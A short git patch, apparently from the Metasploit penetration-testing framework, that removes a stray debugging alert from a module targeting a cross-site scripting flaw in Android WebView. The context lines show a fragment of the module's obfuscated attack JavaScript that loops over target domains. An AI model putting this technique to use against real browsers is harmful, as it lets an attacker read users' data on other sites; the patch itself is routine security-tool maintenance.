From 0ad9f958067db3516b8616aec688c7136de1a939 Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Thu, 30 Oct 2014 10:52:06 -0500 Subject: [PATCH] Remove stray alert() for debugging. --- modules/auxiliary/gather/android_object_tag_webview_uxss.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/gather/android_object_tag_webview_uxss.rb b/modules/auxiliary/gather/android_object_tag_webview_uxss.rb index 47046db92f..8c16ed6fcb 100644 --- a/modules/auxiliary/gather/android_object_tag_webview_uxss.rb +++ b/modules/auxiliary/gather/android_object_tag_webview_uxss.rb @@ -72,7 +72,6 @@ class Metasploit3 < Msf::Auxiliary domains = datastore['TARGET_URLS'].split(',') script = js_obfuscate <<-EOS - window.onerror=alert; var targets = JSON.parse(atob("#{Rex::Text.encode_base64(JSON.generate(domains))}")); targets.forEach(function(target, i){ var obj = document.createElement('object');